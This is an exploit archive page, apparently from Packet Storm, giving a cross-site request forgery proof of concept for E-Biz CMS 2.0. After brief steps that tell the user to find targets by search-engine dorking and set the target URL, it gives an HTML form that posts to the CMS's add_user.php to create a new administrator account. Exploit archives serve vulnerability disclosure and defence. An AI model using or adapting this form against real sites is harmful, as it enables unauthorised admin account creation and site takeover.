what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

E-Biz CMS 2.0 Cross Site Request Forgery

E-Biz CMS 2.0 Cross Site Request Forgery
Posted Aug 14, 2023
Authored by indoushka

E-Biz CMS version 2.0 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 0051b3ec1334ec05af6d228c8a79d4a9b5645a0e801b6a2ea22a9b8fb0623d1d

E-Biz CMS 2.0 Cross Site Request Forgery

Change Mirror Download
====================================================================================================================================
| # Title : E-Biz CMS v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://softech.pk/ |
| # Dork : Copyright © 2019, Designed By SOFTECH |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 17.

[+] Set the target site link Save changes and apply .

[+] infected file : /add_user.php.

[+] http://127.0.0.1/q7.3/softpanel/add_user.php.

[+] save code as poc.html .

<h1>Add User</h1>
</div>
<!-- #contentHeader -->
<div class="site">
<div class="container">
<div class="grid-16">

<div class="widget" >
<div class="widget-header"> <span class="icon-wrench"></span>
<h3>Add User </h3>
</div>
<!-- .widget-header -->
<div class="widget-content">
<!-- .field-group -->
<!-- .field-group -->
<!-- .field-group -->
<form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">
<table width="650" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="527" align="left"><strong>Name : </strong></td>
</tr>
<tr>
<td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>
</tr>
<tr>
<td><strong>Email :</strong> </td>
</tr>
<tr>
<td><span class="field">
<input name="email" type="text" id="date" class="validate[required,custom[email]" size="50" />
</span></td>
</tr>
<tr>
<td><strong>Password :</strong></td>
</tr>
<tr>
<td><div class="field">
<input name="password" type="text" id="date_English" class="validate[required]" size="50" />
</div> </td>
</tr>
<tr>
<td><strong>Access : </strong></td>
</tr>
<tr>
<td><select name="type" id="type" >
<option value="user" selected="selected">User</option>
<option value="admin">Admin</option>
</select> </td>
</tr>
<tr id="link">
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="30"><strong id="">Privileges:</strong></td>
</tr>
<tr>
<td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">

<tr>
<td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="25"><label for="label">Company News</label></td>
<td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>
</tr> <tr>
<td height="25">Home Banners</td>
<td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>
</tr> <tr>
<td height="25">Gallery</td>
<td><input type="checkbox" id="gal" name="gallery" value="Y" onClick="gallery.value=(this.checked)?'Y':'N'"></td>
</tr> <tr>
<td height="25"><label for="sim">Simple Gallery</label></td>
<td><input type="checkbox" id="gallery" name="simple_gallery" value="Y" onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>
</tr> <tr>
<td height="25">Pages</td>
<td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>
</tr> <tr>
<td height="25">Newsletter</td>
<td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>
</tr> <tr>
<td height="25">Categories</td>
<td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>
</tr> </table> </td>
</tr>

</table> </td>
</tr>
</table></td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td></td>
</tr>


<tr>
<td>&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td>&nbsp;</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td> </td>
</tr>
<tr>
<td>&nbsp;</td>
</tr>
<tr>
<td><button name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>

<button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>
</tr>
</table>
</form>
</div>

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close